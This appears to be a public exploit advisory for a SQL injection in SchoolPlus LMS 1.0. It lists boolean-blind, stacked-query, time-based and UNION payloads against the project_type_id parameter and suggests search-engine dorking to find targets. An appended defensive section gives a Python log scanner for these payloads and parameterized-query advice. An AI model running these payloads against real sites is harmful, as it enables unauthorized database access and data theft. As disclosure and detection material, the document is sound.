SchoolPlus LMS 1.0 SQL Injection
SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.
=============================================================================================================================================
| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)
| # Vendor    : http://webpay.com.np/#Product
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] use payload : index.php?project_type_id=1
[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here
[+] Parameter: project_type_id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: project_type_id=1 AND 5604=5604

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)
    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- -
---

Greetings to :
============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr
============================================================
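
Detection sketch for the parameter above, added here as an example and not part of the original advisory or the vendor's code: project_type_id should only ever carry an integer, so a web access log can be scanned for any other value and the hit labelled with the technique class from the PoC output. The log format, the sample lines and the names classify, scan and SAMPLE_LOG are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "project_type_id"  # the injectable GET parameter named in the advisory
# One marker per technique class in the advisory's PoC output; first match wins.
TECHNIQUES = [
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("stacked", re.compile(r";\s*select\b|\bbenchmark\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(?:and|or)\b\s+\(?\s*\d+\s*=\s*\d+", re.I)),
]
# Assumption: common/combined log format with the request line in quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-integer"  # still worth flagging: the id should only be digits


def scan(lines):
    """Return (line_number, label, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        # parse_qs percent-decodes values, so encoded payloads are matched too.
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            label = classify(value)
            if label:
                hits.append((number, label, value))
    return hits


# Constructed sample access-log lines (documentation address, invented path).
PREFIX = '192.0.2.44 - - [01/Jan/2024:10:00:00 +0000] "GET /projects/index.php?'
SAMPLE_LOG = [PREFIX + q + ' HTTP/1.1" 200 512' for q in (
    "project_type_id=1",
    "project_type_id=1%20AND%205604=5604",
    "project_type_id=1%3BSELECT%20BENCHMARK(5000000,MD5(0x45507849))%23",
    "project_type_id=1%20AND%20(SELECT%205053%20FROM%20(SELECT(SLEEP(5)))tLpS)",
    "project_type_id=-1%20UNION%20ALL%20SELECT%20NULL,NULL--%20-",
    "page=2",
)]
```

The same integer-only rule belongs in the application itself: casting project_type_id to an integer or binding it in a parameterized query closes the injection point instead of only reporting on it.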